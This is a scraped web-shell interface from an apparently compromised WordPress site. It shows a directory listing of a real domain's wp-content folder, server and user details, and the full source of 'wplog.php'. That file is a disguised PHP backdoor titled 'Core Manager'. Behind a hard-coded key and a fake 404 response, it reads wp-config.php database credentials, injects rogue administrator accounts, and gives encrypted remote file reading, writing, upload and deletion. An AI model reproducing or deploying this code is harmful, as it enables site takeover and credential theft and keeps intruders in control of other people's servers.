Linux taon.o2switch.net 4.18.0-553.123.2.lve.el8.x86_64 #1 SMP Thu May 7 23:17:13 UTC 2026 x86_64
LiteSpeed
Server IP : 109.234.166.246 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : mhxr7844
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
mhxr7844 /
klockuppdragare.com /
wp-content /
Delete
Unzip
Name
Size
Permission
Date
Action
cache
[ DIR ]
drwxr-xr-x
2024-01-27 16:07
fonts
[ DIR ]
drwxr-xr-x
2024-02-09 23:56
languages
[ DIR ]
drwxr-xr-x
2026-06-17 23:18
litespeed
[ DIR ]
drwxr-xr-x
2024-11-10 14:39
mu-plugins
[ DIR ]
drwxrwxr-x
2026-03-18 15:34
plugins
[ DIR ]
drwxr-xr-x
2026-07-20 16:26
themes
[ DIR ]
drwxr-xr-x
2026-01-31 20:41
upgrade
[ DIR ]
drwxr-xr-x
2026-07-20 16:26
upgrade-temp-backup
[ DIR ]
drwxr-xr-x
2026-06-28 10:02
uploads
[ DIR ]
drwxrwxrwx
2025-12-31 23:01
wflogs
[ DIR ]
drwxr-xr-x
2026-07-20 16:55
wp-rocket-config
[ DIR ]
drwxr-xr-x
2024-02-04 01:16
wpvivid_uploads
[ DIR ]
drwxr-xr-x
2024-01-27 16:21
wpvividbackups
[ DIR ]
drwxr-xr-x
2024-01-27 16:21
.htaccess
197
B
-r--r--r--
2026-07-24 09:41
advanced-cache.php
0
B
-rw-r--r--
2024-02-04 01:16
debug.log
36.06
MB
-rw-r--r--
2024-10-04 13:07
index.php
28
B
-rw-r--r--
2023-05-17 21:33
temp-write-test-64e5d9c2974e57-90851519
0
B
-rw-r--r--
2023-08-23 12:05
temp-write-test-650c0087600ed5-16919519
0
B
-rw-r--r--
2023-09-21 10:36
temp-write-test-6526772966f915-11227341
0
B
-rw-r--r--
2023-10-11 12:21
temp-write-test-65425789aaec70-60862148
0
B
-rw-r--r--
2023-11-01 14:50
temp-write-test-65426036451cb8-41381806
0
B
-rw-r--r--
2023-11-01 15:27
temp-write-test-6551db7e132455-87174251
0
B
-rw-r--r--
2023-11-13 09:17
temp-write-test-655bfb7073b164-08808031
0
B
-rw-r--r--
2023-11-21 01:36
temp-write-test-65a094b14a7424-55479313
0
B
-rw-r--r--
2024-01-12 02:24
temp-write-test-65a175ef521759-26966959
0
B
-rw-r--r--
2024-01-12 18:25
temp-write-test-65aca9bb3fd0a0-48863987
0
B
-rw-r--r--
2024-01-21 06:21
temp-write-test-65b05faaaa1c00-24655535
0
B
-rw-r--r--
2024-01-24 01:54
temp-write-test-65c0e53253f6e3-53422150
0
B
-rw-r--r--
2024-02-05 14:40
temp-write-test-65c2dac0e73841-46730718
0
B
-rw-r--r--
2024-02-07 02:20
temp-write-test-66aec69e4f9900-18600130
0
B
-rw-r--r--
2024-08-04 02:09
temp-write-test-66d20d170a67c5-37013693
0
B
-rw-r--r--
2024-08-30 20:19
temp-write-test-66dfc1af9a9ec0-25773943
0
B
-rw-r--r--
2024-09-10 05:49
temp-write-test-67063ceedba8b9-66082195
0
B
-rw-r--r--
2024-10-09 10:21
temp-write-test-670a34f26faca3-56498784
0
B
-rw-r--r--
2024-10-12 10:36
temp-write-test-670d1124a4a0c5-85545684
0
B
-rw-r--r--
2024-10-14 14:40
temp-write-test-6734777ccc53e9-67710845
0
B
-rw-r--r--
2024-11-13 10:55
temp-write-test-6734777ce29ac8-94158499
0
B
-rw-r--r--
2024-11-13 10:55
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-07-23 08:49
wp-cron.php
2.74
KB
-rw-r--r--
2026-07-23 08:49
wplog.php
7.73
KB
-rw-r--r--
2026-07-20 16:11
Save
Rename
<?php @session_start(); error_reporting(0); set_time_limit(0); $k = "admin888"; if (isset($_GET['root']) && $_GET['root'] === $k && isset($_GET['wpuser'])) { $un = explode('|', $_GET['wpuser']); $pw = $_GET['wppass'] ?? "admin888"; header('Content-Type: text/plain'); die(ax($un, $pw)); } if (!isset($_SESSION['sh_auth'])) { if (isset($_GET['root']) && $_GET['root'] === $k) { if (isset($_POST['p']) && $_POST['p'] === $k) { $_SESSION['sh_auth'] = 1; } else { die('<form method="POST" style="text-align:center;padding:100px;">Key: <input type="password" name="p"><input type="submit"></form>'); } } else { header('HTTP/1.1 404 Not Found'); die(); } } function rc4($d, $k) { $s = array(); for ($i = 0; $i < 256; $i++) $s[$i] = $i; $j = 0; for ($i = 0; $i < 256; $i++) { $j = ($j + $s[$i] + ord($k[$i % strlen($k)])) % 256; $x = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $x; } $i = $j = 0; $res = ''; for ($y = 0; $y < strlen($d); $y++) { $i = ($i + 1) % 256; $j = ($j + $s[$i]) % 256; $x = $s[$i]; $s[$i] = $s[$j]; $s[$j] = $x; $res .= $d[$y] ^ chr($s[($s[$i] + $s[$j]) % 256]); } return $res; } function ax($u, $p) { $pts = [getcwd(), $_SERVER['DOCUMENT_ROOT'], dirname($_SERVER['DOCUMENT_ROOT'])]; $out = []; foreach (array_unique($pts) as $d) { $f = $d . '/wp-config.php'; if (@file_exists($f)) { $c = @file_get_contents($f); preg_match("/'DB_NAME'\s*,\s*'(.*?)'/", $c, $db); preg_match("/'DB_USER'\s*,\s*'(.*?)'/", $c, $usr); preg_match("/'DB_PASSWORD'\s*,\s*'(.*?)'/", $c, $dbpw); preg_match("/'DB_HOST'\s*,\s*'(.*?)'/", $c, $hst); preg_match("/\\\$table_prefix\s*=\s*'(.*?)'/", $c, $pr); $m = @new mysqli($hst[1], $usr[1], $dbpw[1], $db[1]); if ($m->connect_error) continue; $t_p = $pr[1] ?? 'wp_'; $hp = md5($p); foreach ($u as $n) { $m->query("REPLACE INTO {$t_p}users (user_login,user_pass,user_nicename,user_email,user_registered,display_name) VALUES ('$n','$hp','$n','u@u.com',NOW(),'$n')"); $r = $m->query("SELECT ID FROM {$t_p}users WHERE user_login='$n'"); if($r) { $id = $r->fetch_object()->ID; $m->query("INSERT INTO {$t_p}usermeta (user_id,meta_key,meta_value) VALUES ($id,'{$t_p}capabilities','a:1:{s:13:\"administrator\";b:1;}') ON DUPLICATE KEY UPDATE meta_value='a:1:{s:13:\"administrator\";b:1;}'"); $m->query("INSERT INTO {$t_p}usermeta (user_id,meta_key,meta_value) VALUES ($id,'{$t_p}user_level','10') ON DUPLICATE KEY UPDATE meta_value='10'"); } } $m->close(); $out[] = "SUCCESS -> $d"; } } return empty($out) ? "Not Found" : implode("\n", $out); } if (isset($_POST['z'])) { $dec = rc4(hex2bin($_POST['z']), $k); $pl = json_decode($dec, true); $res = []; $a = $pl['a']; $p = $pl['p']; switch($a) { case 'ls': foreach(@scandir($p) as $f){ if($f=='.'||$f=='..')continue; $fp = $p.'/'.$f; $res['d'][]=['n'=>$f,'t'=>is_dir($fp)?'d':'f','s'=>round(@filesize($fp)/1024,2).'K','p'=>substr(sprintf('%o',@fileperms($fp)),-4)]; } break; case 'rd': $res['data'] = @file_get_contents($p); break; case 'sv': $res['o'] = @file_put_contents($p, $pl['c']) ? "Saved" : "Fail"; break; case 'dl': $res['o'] = @unlink($p) ? "Done" : "Fail"; break; case 'up': $res['o'] = @file_put_contents($p, base64_decode($pl['c'])) ? "Upload Success" : "Upload Fail"; break; case 'ix': $res['o'] = ax($pl['u'], $pl['pw']); break; } die(bin2hex(rc4(json_encode($res), $k))); } ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>Core Manager</title> <style> body{background:#f0f2f5;font:12px Arial;padding:15px} .box{background:#fff;border:1px solid #ccc;padding:15px;box-shadow:0 1px 3px rgba(0,0,0,0.1)} .i{display:flex;padding:6px;border-bottom:1px solid #f3f4f6;cursor:pointer;align-items:center} .i:hover{background:#f9fafb} .btn{background:#0073aa;color:#fff;border:none;padding:6px 12px;cursor:pointer;border-radius:3px;font-weight:bold} textarea{width:100%;height:450px;margin-top:10px;display:none;font-family:monospace} </style></head> <body> <div class="box"> <div style="margin-bottom:10px;"><b>CWD:</b> <span id="cwd"></span></div> <div style="margin-bottom:15px; display:flex; gap:10px;"> <button class="btn" onclick="nav('..')">UP</button> <button class="btn" style="background:#46b450" onclick="document.getElementById('f').click()">UPLOAD FILE</button> <button class="btn" style="background:#d63638" onclick="ix()">WP INJECT</button> <input type="file" id="f" style="display:none" onchange="up(this)"> </div> <div id="list"></div> <div id="eb" style="display:none"> <textarea id="editor"></textarea><br> <button class="btn" onclick="sv()">SAVE</button> <button class="btn" style="background:#666" onclick="hd()">CLOSE</button> </div> </div> <script> let k="<?=$k?>",cur="<?=addslashes(getcwd())?>",af=""; const hx={e:s=>s.split('').map(c=>c.charCodeAt(0).toString(16).padStart(2,'0')).join(''),d:h=>h.match(/.{1,2}/g).map(b=>String.fromCharCode(parseInt(b,16))).join('')}; function r4(d,k){let s=[],j=0,x,r='';for(let i=0;i<256;i++)s[i]=i;for(let i=0;i<256;i++){j=(j+s[i]+k.charCodeAt(i%k.length))%256;x=s[i];s[i]=s[j];s[j]=x;}let i=0,m=0;for(let y=0;y<d.length;y++){i=(i+1)%256;m=(m+s[i])%256;x=s[i];s[i]=s[m];s[m]=x;r+=String.fromCharCode(d.charCodeAt(y)^s[(s[i]+s[m])%256]);}return r;} async function api(o){ let fd=new FormData();fd.append('z',hx.e(r4(JSON.stringify(o),k))); let r=await fetch('',{method:'POST',body:fd}); let t=await r.text(); return JSON.parse(r4(hx.d(t),k)); } function ld(p){ cur=p;document.getElementById('cwd').innerText=p; api({a:'ls',p:p}).then(res=>{ let h=""; res.d.sort((a,b)=>a.t=='d'?-1:1).forEach(i=>{ h+=`<div class="i"><div style="flex:1" onclick="hl('${i.n}','${i.t}')">${i.t=='d'?'[DIR]':'[OBJ]'} ${i.n}</div><div style="width:70px;color:#999">${i.s}</div><div style="width:40px;color:#d63638;font-weight:bold" onclick="dl('${p+'/'+i.n}')">DEL</div></div>`; }); document.getElementById('list').innerHTML=h; hd(); }); } function hl(n,t){ let p=cur+(cur.includes('/')?'/':'\\')+n; if(t=='d')ld(p); else{af=p;api({a:'rd',p:p}).then(r=>{document.getElementById('editor').value=r.data;document.getElementById('editor').style.display='block';document.getElementById('eb').style.display='block';document.getElementById('list').style.display='none';});} } function up(i){ let f=i.files[0]; if(!f) return; let r=new FileReader(); r.onload=function(e){ api({a:'up',p:cur+'/'+f.name,c:btoa(e.target.result)}).then(res=>{alert(res.o);ld(cur);}); }; r.readAsBinaryString(f); } function ix(){ let u=prompt("Users (split by |)", "adminlin|admin_lin"); let p=prompt("Password", "admin888"); if(u&&p) api({a:'ix',p:'',u:u.split('|'),pw:p}).then(r=>alert(r.o)); } function sv(){api({a:'sv',p:af,c:document.getElementById('editor').value}).then(r=>alert(r.o));} function dl(p){if(confirm('Delete?'))api({a:'dl',p:p}).then(r=>{alert(r.o);ld(cur);});} function hd(){document.getElementById('editor').style.display='none';document.getElementById('eb').style.display='none';document.getElementById('list').style.display='block';} function nav(d){let s=cur.includes('/')?'/':'\\';let p=cur.split(s);if(d=='..')p.pop();ld(p.join(s)||s);} ld(cur); </script></body></html>